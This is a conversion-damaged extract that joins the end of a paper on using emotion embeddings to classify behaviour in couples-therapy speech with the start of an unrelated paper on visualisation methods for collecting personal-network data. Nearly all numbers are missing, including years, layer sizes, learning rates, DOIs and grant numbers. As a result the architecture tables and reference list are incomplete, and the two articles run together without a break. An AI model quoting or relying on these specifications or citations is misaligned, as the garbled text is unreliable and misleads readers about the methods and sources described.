(e.g., acceptance, positivity), the context based model can achieve better performance than the reduced context model. while the pur differences from ‘‘negative’’ related behaviors (e.g., blame, negativity) varies from different behaviors. for example, the behavior of acceptance, with a large pur difference, it is more related to ‘‘understanding, respect for partner’s views, feelings and behaviors’’, which could involve more turns in a dialog and context information. in addition, positivity requires the monitoring of consistent positive behavior, since a single negative instance within a long positive time interval would still reduce positivity to a very low rating. in contrast, we see that although blame can still benefit from a larger contextual window, there is no benefit to employing the full context. this may infer that blame expression is more localized. furthermore, our findings are also congruent with many domain annotation processes: some behaviors are potentially dominated by salient information with short range, and one short duration appearance can have a significant impact on the whole behavior rating, while some behaviors need longer context to analyze (heavey, gill & christensen, ; jones & christensen, ). however, among all behaviors, ‘‘sadness’’ is always the hardest one to predict with high accuracy, and there is little improvement after introducing different bps. this could be resulting from the extremely skewed distribution towards low ratings as mentioned in above and (georgiou et al., ; black et al., ), which leads to a very blurred binary classification boundary compared to other behaviors. the detailed network architecture and training parameters are shown in the appendix from tables a –a . li et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. conclusion and future work in this work, we explored the relationship between emotion and behavior states, and further employed emotions as behavioral primitives in behavior classification. in our designed systems, we first verified the existing connection between basic emotions and behaviors, then further verified the effectiveness of utilizing emotions as behavior primitive embeddings for behavior quantification through transfer learning. moreover, we designed a reduced context model to investigate the importance of context information in behavior quantification. through our models, we additionally investigated the empirical analysis window size for speech behavior understanding, and verified the hypothesis that the order of affective states is an important factor for behavior analysis. we provided experimental evidence and systematic analyses for behavior understanding via emotion information. to summarized, we investigated three questions and we concluded: . can the basic emotion states infer behaviors? the answer is yes. behavioral states can be weakly inferred from emotions states. however behavior requires richer information than just binary emotions. . can emotion-informed embeddings be employed in the prediction of behaviors? the answer is yes. the rich emotion involved embedding representation helps the prediction of behaviors. they also do so much better than the information-bottlenecked binary emotions. . is the contextual (sequential) information important in defining behaviors? the answer is yes. we verify the importance of context of behavior indicators for all behaviors. some behaviors benefit from incorporating the full interaction ( minutes) length while others require as little as seconds of information, but all perform best when given contextual information. moreover, the proposed neural network systems are not limited to the datasets and domains of this work, but potentially provides a path for investigating a range of problems, such as local versus global, sequential versus non-sequential comparisons in many related areas. in addition to the relationship of emotions to behaviors, a range of other cues can also be incorporated towards behavior quantification. moreover, many other aspects of behavior, such as entrainment, turn-taking duration, pauses, non-verbal vocalizations, and influence between interlocutors, can be incorporated. many such additional features can be similarly developed on different data and employed as primitives; for example entrainment measures can be trained through unlabeled data (nasir et al., ). furthermore, we expect that the results of behavior classification accuracy maybe be further improved through improved architectures, parameter tuning, and data engineering for each behavior of interest. in addition, behavior primitives, e.g., from emotions, can also be employed via the lexical and visual modalities. acknowledgements the authors would like to thank yi zhou, sandeep nallan chakravarthula and professor shrikanth narayanan for helpful discussions and comments. li et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. appendix a. detailed network architecture and training parameters table a network architecture of er. multi-emotion regression network (er) framework (input: * ; output: ) training details: adam optimizer(lr = e– ), batch size , mseloss conv d(in_ch= , out_ch= , kernel size= , stride= , padding= ) relu conv d(in_ch= , out_ch= , kernel size= , stride= , padding= ) relu conv d(in_ch= , out_ch= , kernel size= , stride= , padding= ) relu conv d(in_ch= , out_ch= , kernel size= , stride= , padding= ) relu adaptivemaxpool d( ) linear(in = , out = ) relu linear(in = , out = ) relu linear(in = , out = ) table a network architecture of ec. single-emotion classification network (ec) framework (input: * ; output: ) training details: adam optimizer(lr = e– ), crossentropyloss, batch size: ; ; conv d(in_ch= , out_ch= , kernel size= , stride= , padding= ) relu conv d(in_ch= , out_ch= , kernel size= , stride= , padding= ) relu conv d(in_ch= , out_ch= , kernel size= , stride= , padding= ) relu conv d(in_ch= , out_ch= , kernel size= , stride= , padding= ) relu adaptivemaxpool d( ) linear(in = , out = ) relu linear(in = , out = ) relu pretrained linear(in = , out = ) prelu linear(in = , out = ) prelu linear(in = , out = ) trainable table a b-bp based context-dependent behavior recognition model framework. e-bp based context-dependent behavior recognition model (input: seq_len* ; output: ) training details: adam optimizer(lr = e– ) + polynomial learning rate decay, masked bcewithlogitsloss, batch size: emotion recognition framework pretrained gru(in_size = , hidden_size = , num_layers= ) linear(in = , out = ) relu trainable linear(in = , out = ) li et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. table a e-bp based context-dependent behavior recognition model framework. e-bp based context-dependent behavior recognition model (input: seq_len * * ; output: ) training details: adam optimizer(lr = e– ) + polynomial learning rate decay, masked bcewithlogitsloss, batch size: , epochs= conv d(in_ch= , out_ch= , kernel size= , stride= , padding= ) relu partly pretrained partly trainable conv d(in_ch= , out_ch= , kernel size= , stride= , padding= ) relu conv d(in_ch= , out_ch= , kernel size= , stride= , padding= ) relu conv d(in_ch= , out_ch= , kernel size= , stride= , padding= ) relu adaptivemaxpool d( ) gru(in_size = , hidden_size = , num_layers= ) linear(in = , out = ) relu linear(in = , out = ) trainable table a e-bp based reduced context-dependent behavior recognition model framework. those avgpool d layers are optional to adjust tem- poral receptive field size. e-bp based reduced context-dependent behavior recognition model (input: * seq_len ; output: ) training details: adam optimizer(lr = e– ) + polynomial learning rate decay, masked bcewithlogitsloss, batch size: , epochs= conv d(in_ch= , out_ch= , kernel size= , stride= , padding= ) relu behavior primitive embedding (pretrained) conv d(in_ch= , out_ch= , kernel size= , stride= , padding= ) relu conv d(in_ch= , out_ch= , kernel size= , stride= , padding= ) relu conv d(in_ch= , out_ch= , kernel size= , stride= , padding= ) relu conv d(in_ch= , out_ch= , kernel size= , stride= , padding= ) avgpool d(kernel size= , stride= ) relu dropout(prob= . ) conv d(in_ch= , out_ch= , kernel size= , stride= , padding= ) avgpool d(kernel size= , stride= ) relu dropout(prob= . ) conv d(in_ch= , out_ch= , kernel size= , stride= , padding= ) avgpool d(kernel size= , stride= ) relu dropout(prob= . ) conv d(in_ch= , out_ch= , kernel size= , stride= , padding= ) avgpool d(kernel size= , stride= ) relu dropout(prob= . ) adaptivemaxpool d( ) linear(in = , out = ) relu linear(in = , out = ) relu linear(in = , out = ) trainable additional information and declarations funding this work was funded by the department of defense. the us army medical research acquisition activity is the awarding and administering acquisition office. this work was li et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. supported by the office of the assistant secretary of defense for health affairs through the psychological health and traumatic brain injury research program under award no. w xwh- - - . there was no additional external funding received for this study. the funders had no role in study design, data collection and analysis, decision to publish, or preparation of the manuscript. grant disclosures the following grant information was disclosed by the authors: department of defense. us army medical research acquisition activity. office of the assistant secretary of defense for health affairs: w xwh- - - . competing interests the authors declare there are no competing interests. author contributions • haoqi li conceived and designed the experiments, performed the experiments, analyzed the data, prepared figures and/or tables, performed the computation work, authored or reviewed drafts of the paper, approved the final draft. • brian baucom analyzed the data, authored or reviewed drafts of the paper, approved the final draft. • panayiotis georgiou conceived and designed the experiments, prepared figures and/or tables, authored or reviewed drafts of the paper, approved the final draft. data availability the following information was supplied regarding data availability: the code used in this work is available at https://bitbucket.org/georgiou/emotions_as_ primitives_towards_behavior_understanding. the couples therapy corpus involves human subjects participating in real couple therapy interactions and as such is protected under an institutional review board (irb). information on obtaining irb clearance and access to the corpus can be obtained by contacting the author: haoqi li, haoqili@usc.edu. references aldeneh z, provost em. . using regional saliency for speech emotion recognition. in: ieee international conference on acoustics, speech and signal processing (icassp). piscataway: ieee, – . ambady n, rosenthal r. . thin slices of expressive behavior as predictors of interpersonal consequences: a meta-analysis. psychological bulletin ( ): – doi . / - . . . . anand n, verma p. . convoluted feelings convolutional and recurrent nets for detecting emotion from audio data. technical report. stanford university. li et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://bitbucket.org/georgiou/emotions_as_primitives_towards_behavior_understanding https://bitbucket.org/georgiou/emotions_as_primitives_towards_behavior_understanding mailto:haoqili@usc.edu http://dx.doi.org/ . / - . . . http://dx.doi.org/ . /peerj-cs. baer js, wells ea, rosengren db, hartzler b, beadnell b, dunn c. . agency context and tailored training in technology transfer: a pilot evaluation of motiva- tional interviewing training for community counselors. journal of substance abuse treatment ( ): – doi . /j.jsat. . . . baumeister rf, dewall cn, vohs kd, alquist jl. . does emotion cause behavior (apart from making people do stupid, destructive things). in: then a miracle occurs: focusing on behavior in social psychological theory and research. new york: oxford university press, – . baumeister rf, vohs kd, nathan dewall c, zhang l. . how emotion shapes behavior: feedback, anticipation, and reflection, rather than direct causation. person- ality and social psychology review ( ): – doi . / . beale r, peter c. . affect and emotion in human-computer interaction. berlin/heidel- berg: springer. bengio y. . deep learning of representations for unsupervised and transfer learning. in: proceedings of icml workshop on unsupervised and transfer learning. – . bengio y, courville a, vincent p. . representation learning: a review and new perspectives. ieee transactions on pattern analysis and machine intelligence ( ): – doi . /tpami. . . black m, katsamanis a, lee c-c, lammert ac, baucom br, christensen a, georgiou pg, narayanan ss. . automatic classification of married couples’ behavior using audio features. in: eleventh annual conference of the international speech communication association. black mp, katsamanis a, baucom br, lee c-c, lammert ac, christensen a, georgiou pg, narayanan ss. . toward automating a human behavioral coding system for married couples interactions using speech acoustic features. speech communication ( ): – doi . /j.specom. . . . burum ba, goldfried mr. . the centrality of emotion to psychological change. clinical psychology: science and practice ( ): – . busso c, narayanan ss. . the expression and perception of emotions: comparing assessments of self versus others. in: ninth annual conference of the international speech communication association. cabanac m. what is emotion? behavioural processes ( ): – doi . /s - ( ) - . carney dr, colvin cr, hall ja. . a thin slice perspective on the accuracy of first impressions. journal of research in personality ( ): – doi . /j.jrp. . . . carrillo f, mota n, copelli m, ribeiro s, sigman m, cecchi g, slezak df. . emotional intensity analysis in bipolar subjects. arxiv preprint. arxiv: . . chakravarthula sn, baucom b, narayanan s, georgiou p. . an analysis of observation length requirements in spoken language for machine understanding of human behaviors. arxiv preprint. arxiv: . . christensen a, atkins dc, berns s, wheeler j, baucom dh, simpson le. . traditional versus integrative behavioral couple therapy for significantly and li et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /j.jsat. . . http://dx.doi.org/ . / http://dx.doi.org/ . /tpami. . http://dx.doi.org/ . /j.specom. . . http://dx.doi.org/ . /s - ( ) - http://dx.doi.org/ . /j.jrp. . . http://arxiv.org/abs/ . http://arxiv.org/abs/ . http://dx.doi.org/ . /peerj-cs. chronically distressed married couples. journal of consulting and clinical psychology ( ): – doi . / - x. . . . chung j, gulcehre c, cho k, bengio y. . empirical evaluation of gated recurrent neural networks on sequence modeling. in: nips workshop on deep learning, december . collobert r, weston j, bottou l, karlen m, kavukcuoglu k, kuksa p. . natural language processing (almost) from scratch. journal of machine learning research (aug): – . cowie r, cornelius rr. . describing the emotional states that are expressed in speech. speech communication ( – ): – doi . /s - ( ) - . cowie r, douglas-cowie e, tsapatsoulis n, votsis g, kollias s, fellenz w, taylor jg. . emotion recognition in human-computer interaction. ieee signal processing magazine ( ): – doi . / . . cummins n, scherer s, krajewski j, schnieder s, epps j, quatieri tf. . a review of depression and suicide risk assessment using speech analysis. speech communication : – doi . /j.specom. . . . dunlop s, wakefield m, kashima y. . can you feel it? negative emotion, risk, and narrative in health communication. media psychology ( ): – doi . / . ekman p. a. are there basic emotions? psychological review ( ): – doi . / - x. . . . ekman p. b. an argument for basic emotions. cognition & emotion ( – ): – doi . / . el ayadi m, kamel ms, karray f. . survey on speech emotion recognition: fea- tures, classification schemes, and databases. pattern recognition ( ): – doi . /j.patcog. . . . feinberg me, kan ml, hetherington em. . the longitudinal influence of coparent- ing conflict on parental negativity and adolescent maladjustment. journal of marriage and family ( ): – doi . /j. - . . .x. georgiou pg, black mp, lammert ac, baucom br, narayanan ss. . ‘‘that’s aggra- vating, very aggravating’’: is it possible to classify behaviors in couple interactions using automatically derived lexical features? in: d’mello s, graesser a, schuller b, martin j-c, eds. affective computing and intelligent interaction. berlin: springer berlin, heidelberg, – . georgiou pg, black mp, narayanan ss. . behavioral signal processing for under- standing (distressed) dyadic interactions: some recent developments. in: proceedings of the joint acm workshop on human gesture and behavior understanding. acm, – . ghahremani p, babaali b, povey d, riedhammer k, trmal j, khudanpur s. . a pitch extraction algorithm tuned for automatic speech recognition. in: acoustics, speech and signal processing (icassp), ieee international conference on. ieee, – . li et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . / - x. . . http://dx.doi.org/ . /s - ( ) - http://dx.doi.org/ . / . http://dx.doi.org/ . /j.specom. . . http://dx.doi.org/ . / http://dx.doi.org/ . / - x. . . http://dx.doi.org/ . / http://dx.doi.org/ . /j.patcog. . . http://dx.doi.org/ . /j. - . . .x http://dx.doi.org/ . /peerj-cs. ghosh pk, tsiartas a, narayanan s. . robust voice activity detection using long- term signal variability. ieee transactions on audio, speech, and language processing ( ): – doi . /tasl. . . gupta r, malandrakis n, xiao b, guha t, van segbroeck m, black m, potamianos a, narayanan s. . multimodal prediction of affective dimensions and depression in human-computer interactions. in: proceedings of the th international workshop on audio/visual emotion challenge. acm, – . han k, yu d, tashev i. . speech emotion recognition using deep neural network and extreme learning machine. in: fifteenth annual conference of the international speech communication association. heavey c, gill d, christensen a. . couples interaction rating system (cirs ). vol. . los angeles: university of california. heavey cl, christensen a, malamuth nm. . the longitudinal impact of demand and withdrawal during marital conflict. journal of consulting and clinical psychology ( ): – doi . / - x. . . . heyman re. . rapid marital interaction coding system (rmics). in: couple observational coding systems. routledge, – . heyman re, chaudhry br, treboux d, crowell j, lord c, vivian d, waters eb. . how much observational data is enough? an empirical test using marital interaction coding. behavior therapy ( ): – doi . /s - ( ) - . hoff e. . language development at an early age: learning mechanisms and outcomes from birth to five years. in: tremblay re, boivin m, peters rdev, rvachew s, eds. encyclopedia on early childhood development. available at http://www.child- encyclopedia.com/language-development-and-literacy/according-experts/language- development-early-age-learning. huang c-w, narayanan s. a. characterizing types of convolution in deep convo- lutional recurrent neural networks for robust speech emotion recognition. arxiv preprint. arxiv: . . huang c-w, narayanan ss. b. deep convolutional recurrent neural network with attention mechanism for robust speech emotion recognition. in: multimedia and expo (icme), ieee international conference on. ieee, – . jones j, christensen a. . couples interaction study: social support interaction rating system. vol. . los angeles: university of california. katsamanis a, black m, georgiou pg, goldstein l, narayanan s. . sailalign: robust long speech-text alignment. in: proc. of workshop on new tools and methods for very-large scale phonetics research. khorram s, jaiswal m, gideon j, mcinnis m, provost e-m. . the priori emotion dataset: linking mood to emotion detected in-the-wild. proc. interspeech – . kingma dp, ba j. . adam: a method for stochastic optimization. arxiv preprint. arxiv: . . li et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /tasl. . http://dx.doi.org/ . / - x. . . http://dx.doi.org/ . /s - ( ) - http://www.child-encyclopedia.com/language-development-and-literacy/according-experts/language-development-early-age-learning http://www.child-encyclopedia.com/language-development-and-literacy/according-experts/language-development-early-age-learning http://www.child-encyclopedia.com/language-development-and-literacy/according-experts/language-development-early-age-learning http://arxiv.org/abs/ . http://arxiv.org/abs/ . http://dx.doi.org/ . /peerj-cs. le d, provost em. . emotion recognition from spontaneous speech using hidden markov models with deep belief networks. in: automatic speech recognition and understanding (asru), ieee workshop on. ieee, – . lee j, tashev i. . high-level feature representation using recurrent neural network for speech emotion recognition. in: sixteenth annual conference of the international speech communication association. li h, baucom b, georgiou p. . sparsely connected and disjointly trained deep neural networks for low resource behavioral annotation: acoustic classification in couples’ therapy. in: proceedings of interspeech. san francisco,. li h, baucom b, georgiou p. . unsupervised latent behavior manifold learning from acoustic features: audio behavior. in: ieee international conference on acoustics, speech and signal processing (icassp). ieee, – . lim w, jang d, lee t. . speech emotion recognition using convolutional and recurrent neural networks. in: signal and information processing association annual summit and conference (apsipa), asia-pacific. ieee, – . lustgarten sd. . emerging ethical threats to client privacy in cloud communication and data storage. professional psychology: research and practice ( ): – doi . /pro . mao q, dong m, huang z, zhan y. . learning salient features for speech emotion recognition using convolutional neural networks. ieee transactions on multimedia ( ): – doi . /tmm. . . metallinou a, wollmer m, katsamanis a, eyben f, schuller b, narayanan s. . context-sensitive learning for enhanced audiovisual emotion classification. ieee transactions on affective computing ( ): – doi . /t-affc. . . mower e, narayanan s. . a hierarchical static-dynamic framework for emotion classification. in: acoustics, speech and signal processing (icassp), ieee international conference on. ieee, – . narayanan s, georgiou pg. . behavioral signal processing: deriving human behavioral informatics from speech and language. proceedings of the ieee ( ): – doi . /jproc. . . nasir m, baucom b, narayanan s, georgiou p. . towards an unsupervised entrainment distance in conversational speech using deep neural networks. arxiv preprint. arxiv: . . nasir m, baucom br, bryan cj, narayanan s, georgiou p. a. complexity in speech and its relation to emotional bond in therapist-patient interactions during suicide risk assessment interviews. in: proceedings of interspeech. stockholm, – . nasir m, baucom br, georgiou p, narayanan s. b. predicting couple ther- apy outcomes based on speech acoustic features. plos one ( ):e doi . /journal.pone. . nasir m, jati a, shivakumar pg, nallan chakravarthula s, georgiou p. . multi- modal and multiresolution depression detection from speech and facial landmark features. in: proceedings of the th international workshop on audio/visual emotion challenge. acm, – . li et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /pro http://dx.doi.org/ . /tmm. . http://dx.doi.org/ . /t-affc. . http://dx.doi.org/ . /jproc. . http://arxiv.org/abs/ . http://dx.doi.org/ . /journal.pone. http://dx.doi.org/ . /peerj-cs. oatley k, jenkins jm. . understanding emotions. hoboken: blackwell publishing. picard rw. . affective computing: challenges. international journal of human- computer studies ( – ): – doi . /s - ( ) - . povey d, ghoshal a, boulianne g, burget l, glembek o, goel n, hannemann m, motlicek p, qian y, schwarz p, silovsky j, stemmer g, vesely k. . the kaldi speech recognition toolkit. in: ieee workshop on automatic speech recognition and understanding, epfl-conf- . ieee signal processing society,. sander d, scherer k. . oxford companion to emotion and the affective sciences. oxford: oup oxford. schacter d, gilbert dt, wegner dm. . psychology ( nd edition). new york: worth. scherer kr. . what are emotions? and how can they be measured? social science information ( ): – doi . / . schlosberg h. . three dimensions of emotion. psychological review ( ): – doi . /h . schuller b, batliner a, steidl s, seppi d. . recognising realistic emotions and affect in speech: state of the art and lessons learnt from the first challenge. speech communication ( – ): – doi . /j.specom. . . . schuller b, rigoll g, lang m. . hidden markov model-based speech emotion recog- nition. in: acoustics, speech, and signal processing, . proceedings.(icassp’ ). ieee international conference on, vol. . ieee, ii– . schuller bw. . speech emotion recognition: two decades in a nutshell, benchmarks, and ongoing trends. communications of the acm ( ): – . sculley d, holt g, golovin d, davydov e, phillips t, ebner d, chaudhary v, young m, crespo j-f, dennison d. . hidden technical debt in machine learning systems. in: cortes c, lawrence nd, lee dd, sugiyama m, garnett r, eds. advances in neural information processing systems. vol. . curran associates, inc., – . soken nh, pick ad. . infants’ perception of dynamic affective expressions: do infants distinguish specific expressions? child development ( ): – doi . / - . . soltau h, liao h, sak h. . neural speech recognizer: acoustic-to-word lstm model for large vocabulary speech recognition. in: proc. interspeech . – . spector pe, fox s. . an emotion-centered model of voluntary work behavior: some parallels between counterproductive work behavior and organizational citizenship behavior. human resource management review ( ): – doi . /s - ( ) - . srivastava n, hinton g, krizhevsky a, sutskever i, salakhutdinov r. . dropout: a simple way to prevent neural networks from overfitting. the journal of machine learning research ( ): – . stasak b, epps j, cummins n, goecke r. . an investigation of emotional speech in depression classification. in: proceedings of interspeech. – . tanaka t, yamamoto t, haruno m. . brain response patterns to economic inequity predict present and future depression indices. nature human behaviour ( ): – doi . /s - - - . li et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /s - ( ) - http://dx.doi.org/ . / http://dx.doi.org/ . /h http://dx.doi.org/ . /j.specom. . . http://dx.doi.org/ . / - . http://dx.doi.org/ . /s - ( ) - http://dx.doi.org/ . /s - - - http://dx.doi.org/ . /peerj-cs. tao j, tan t. . affective computing: a review. in: international conference on affective computing and intelligent interaction. berlin, heidelberg: springer berlin heidelberg, – . tong e, zadeh a, jones c, morency l-p. . combating human trafficking with multimodal deep models. in: proceedings of the th annual meeting of the association for computational linguistics (volume : long papers), vol. . – . torrey l, shavlik j. . transfer learning. in: handbook of research on machine learning applications and trends: algorithms, methods, and techniques. hershey, pennsylvania: igi global, – . tseng s-y, baucom b, georgiou p. . unsupervised online multitask learning of behavioral sentence embeddings. arxiv preprint. arxiv: . . tseng s-y, chakravarthula sn, baucom b, georgiou p. . couples behavior modeling and annotation using low-resource lstm language models. in: proceedings of interspeech. san francisco. venek v, scherer s, morency l-p, rizzo a, pestian j. . adolescent suicidal risk assessment in clinician-patient interaction. ieee transactions on affective computing ( ): – doi . /taffc. . . vinciarelli a, pantic m, bourlard h. . social signal processing: survey of an emerging domain. image and vision computing ( ): – doi . /j.imavis. . . . wöllmer m, metallinou a, eyben f, schuller b, narayanan s. . context-sensitive multimodal emotion recognition from speech and facial expression using bidirec- tional lstm modeling. in: proc. interspeech , makuhari, japan. – . zadeh ab. . cmu-multimodalsdk. github. available at https://github.com/ a zadeh/cmu-multimodalsdk (accessed on march ). zadeh ab, liang pp, poria s, cambria e, morency l-p. . multimodal language analysis in the wild: cmu-mosei dataset and interpretable dynamic fusion graph. in: proceedings of the th annual meeting of the association for computational linguistics (volume : long papers), vol. . – . zheng w, yu j, zou y. . an experimental study of speech emotion recognition based on deep convolutional neural networks. in: affective computing and intelligent interaction (acii), international conference on. ieee, – . li et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://arxiv.org/abs/ . http://dx.doi.org/ . /taffc. . http://dx.doi.org/ . /j.imavis. . . https://github.com/a zadeh/cmu-multimodalsdk https://github.com/a zadeh/cmu-multimodalsdk http://dx.doi.org/ . /peerj-cs. © authors. this work is licensed under the creative commons attribution . license (https://creativecommons.org/licenses/by/ . /). issue | vol. article | doi: . /connections- - what the eye does not see: visualizations strategies for the data collection of personal networks isidro maya-jariego* and romina cachia universidad de sevilla, seville, spain. this paper was edited by eric quintane. *e-mail: isidromj@us.es received for publication january , . abstract the graphic representation of relational data is one of the central el- ements of social network analysis. in this paper, the author describe the use of visualization in interview-based data collection procedures designed to obtain personal networks information, exploring four main contributions. first, the author shows a procedure by which the visualization is integrated with traditional name generators to facili- tate obtaining information and reducing the burden of the interview process. second, the author describes the reactions and qualitative interpretation of the interviewees when they are presented with an analytical visualization of their personal network. the most frequent strategies consist in identifying the key individuals, dividing the per- sonal network in groups and classifying alters in concentric circles of relative importance. next, the author explores how the visualiza- tion of groups in personal networks facilitates the enumeration of the communities in which individuals participate. this allows the author to reflect on the role of social circles in determining the structure of personal networks. finally, the author compares the graphic rep- resentation obtained through spontaneous, hand-drawn sociograms with the analytical visualizations elicited through software tools. this allows the author to demonstrate that analytical procedures reveal aspects of the structure of personal networks that respondents are not aware of, as well as the advantages and disadvantages of using both modes of data collection. for this, the author presents findings from a study of highly skilled migrants living in spain (n = ) through which the author illustrates the challenges, in terms of data reliability, validity and burden on both the researcher and the participants. keywords visualization, personal networks, social support, analytical proce- dures, meaning. network visualizations graphic representation of relational data is one of the central elements of social network analysis (freeman, ). jacob levy moreno produced the first soci- ograms in the s and over the years, they have evolved from ad hoc drawings to sophisticated visu- alizations, largely due to the new possibilities offered by computer and software development (freeman, ; moreno, ). since their inception, visualiza- tions have been integrated in social network analysis in creative ways (freeman, ; hogan et al., ; ryan and d’angelo, ). however, the use of visual- izations to depict already collected data has predomi- nated. such visualizations tend to be used to observe systematically the relations data and to detect emer- gent properties that may only be visible through the structure of the network. visualizations are commonly connections what the eye does not see: visualizations strategies for the data collection of personal network used to discover two kinds of patterns: social groups – a group of nodes highly linked to each other – and social positions – a group of nodes who are linked in the social system in similar ways (freeman, ). only recently has the application of visualization during data collection begun to be used (carrasco et al., ; hogan et al., ; maya jariego and holgado, ; mccarty and govindaramanujam, ; mccarty et al., ; schiffer and hauck, ). there are instances where a network vis- ualization is developed during the data collection with the help of the respondents who collaborate and work together through a collective effort. thus, through the use of participatory tools to elaborate sociograms, participants make “implicit knowledge about networks of influences explicit” (schiffer and hauck, , p. ), apart from allowing the detec- tion of conflicting goals and areas with potential for cooperation. in this paper, we explore the contributions of visu- alizations when collecting personal network data, as well as its use to elicit the qualitative interpretation of individuals about their personal networks. according- ly, we show that the graphic representation of rela- tionships can be used in an innovative way to collect data from personal networks, both to obtain concrete information about relationships (i.e. ties and alters) and in the qualitative interpretation of interaction con- texts by the informants themselves. in the context of personal networks, most data is based on respondents reporting on the own relation of their ties (mccarty and govindaramanujam, ). visualizations are unique in providing an interactive tool for data collection, which may vary from a paper and pencil network visualization to more sophisticat- ed technological programs to gather this kind of data. along the past two decades, a number of software packages with an incorporated visual interface were developed making the use of visualizations during data collection possible. the added value of visualization has been fre- quently sought in elements that go beyond the an- alytical representation of information. for example, it has been found that the hand drawings of the per- sonal network reveal the perception of the social world by individuals (mccarty et al., ); the tech- nique called “net-map,” based on a participatory strategy, is used in the construction of a community sociogram, following a group consensus-evaluation process (maya-jariego, , schiffer and hauck, ); and egoweb has been used to maximize the differentiation of groups, which allows the identifica- tion of the social circles in which the individual partici- pates (mccarty and govindaramanujam, ). visualizations often provide a narrative to the net- work. the structure and composition of the network are very hard to read through a matrix, especially dur- ing data collection. in contrast, graphic representa- tions can be very efficient tools which enable both the researcher and the interviewee to see how the alters are connected visually, hence adding another layer of information during data collection, which would be ig- nored through a matrix. they may also be useful in depicting a wider variety of information that could be utilized to probe participants, bringing them into fur- ther discussion on their networks. for example, dis- cussing why certain nodes are isolated from the rest of the network. nevertheless, using this mode of data collection poses various challenges to the research- ers, in terms of data reliability, validity and the added burden on both the researcher and the participants (bastian et al., ). generating personal networks through visualizations personal networks may vary in size from as small as to s or even s of individuals (killworth et al., ; mccarty et al., ; pool and kochen, ; roberts et al., ). there is no clear bounda- ry delineating personal networks except the objective of the study in question (fu, ), although limiting the number to a reliable subset of alters has been a major concern in personal network analysis. the se- lection is based on a trade-off between an efficient data collection process and achieving the most accu- rate representation of respondents’ personal network based on the objective of the study (bidart and char- bonneau, ). over the years, distinct methods on how to elic- it personal networks and social support networks of people have been elaborated (agneessens et al., ; barrera, ; bidart and charbonneau, ; fischer, ; marin and hampton, ; mccallister and fischer, ), whereby the main tool used is a name generator. comparatively, it has been less com- mon to use network visualizations to gather data on personal and social support networks (hogan et al., ; kahn and antonucci, ), although it was proposed as an efficient strategy to give meaning to the contexts of interaction of the individuals (maya jariego and holgado, ). data on personal networks is typically collected in three stages: name generator, dyad relation between the alters (completing an adjacency matrix) and name interpreters. for each stage, different methods have been developed to elicit the data, varying from pa- per methods to computer-aided programs or a mix connections of both. network visualizations can be used in all of the three stages, whether to collect data or illustrate results (tubaro et al., ). generating names with the support of visualization techniques researchers have used different visual aids and tech- niques to enable respondents enumerate their con- tacts. free-hand spontaneous drawings have been used since the origin of personal networks visuali- zations. free-hand drawings are easy to use, cheap, provide additional information that could be essential in the interpretation of the network through discus- sion and are less prone to technical failure (cheong et al., ). they are also easy to modify during the interview using pencil (hogan et al., ). at times, they have been used as an alternative technique to gather information, as in a study with immigrant chil- dren, where due to the diverse ethnic backgrounds, many of the respondents did not speak, read or write the language of the host country (den besten, ). researchers opting for this approach either leave the interviewees to draw their networks with hardly any instructions or have opted for giving some basic in- structions, so as to maintain some homogeneity be- tween the maps. a second version of this type of spontaneous rep- resentation may be acquired through the use of cards and other props to represent the actors and their power. next, the relationships between actors are drawn. this process is usually carried out in a group, in a participatory manner, and is a way to show a shared vision about relationships in the community (schiffer and hauck, ). despite the differences in format, it is also a creative and spontaneous descrip- tion, without restrictions, of the social network. another common technique is concentric circles hierarchical mapping, whereby concentric circles of different sizes are used to provide a visual guide to interviewees in organizing their alters according to their closeness to ego, who tends to be placed at the center (antonucci, ; carrasco et al., ; ho- gan et al., ). the number of concentric circles depends on the researcher. in previous research, we have observed the number varying from as little as to up to (cheong et al., ; hersberger, ). this approach is sometimes combined with other visual aids, such as dividing the concentric circles into quadrants to gather other type of information (ryan and d’angelo, ); or the use of post-it notes which allows movability and reassessment of certain metrics on the same network (hogan et al., ). an online version has also been tried by tubaro et al. ( ), whereby respondents drew their sociogram on- line, an approach that according to the authors could be useful to study hidden or sensitive populations. the use of concentric circles is easy to prepare, appli- cable to a variety of respondents (samuelsson et al., ) and depending on how you design it, may add network structural data (mccarty et al., ). none- theless, some respondents may find it challenging and confusing given it restricts them to a structure that they may not be comfortable when depicting their personal network (ryan et al., ). location maps have also been used as visual aides to understand movement of people. in a study using geo-referencing cell phone activity, maps were used to show population flows estimated every hour within an urban environment (ratti et al., ). in an- other study, maps were used to illustrate where com- munity residents interacted in the city and the people they met in daily interactions (pearce and milne, ). finally, another very simple way to generate names is to provide different boxes in which respondents can group alters according to different categories. name boxed may be limited by a number, or provided as an open list; and the names obtained are some- times transferred to another type of visualization. the number of names mentioned may be influenced by the number of boxes listed in the questionnaire, with exposure to a larger amount of boxes leading to more alternatives (vehovar et al., ). the characteristics and advantages of these four strategies for obtaining names and relationships are summarized in table . establishing relations between alters with the support of visualization techniques in order to gather data on the structure of the net- work, apart from the relation of each alter with ego, the researcher needs to gather data on the relation for each possible alter dyad. the adjacency matrix is the tool most commonly used for such purposes. this second stage of data collection is where the most benefits of using data visualizations are possi- bly noted. for example, with alters interviewees have to go through possible relations and hence, doing this in a document or a screen with rows and columns is much more burdensome. in fact, network researchers have recently experimented with some innovations in this area. using visualizations, as alternative to the adja- cency matrix, respondents are engaged in a process where slowly they are unveiling their own network. the emergent visible network is a result, which tends to give immediate gratification to the respondents, especially if it is the first time they see their own net- what the eye does not see: visualizations strategies for the data collection of personal network work visualization. it provides an interactive tool which beyond making relations visible, enables both the re- searcher and the participant to 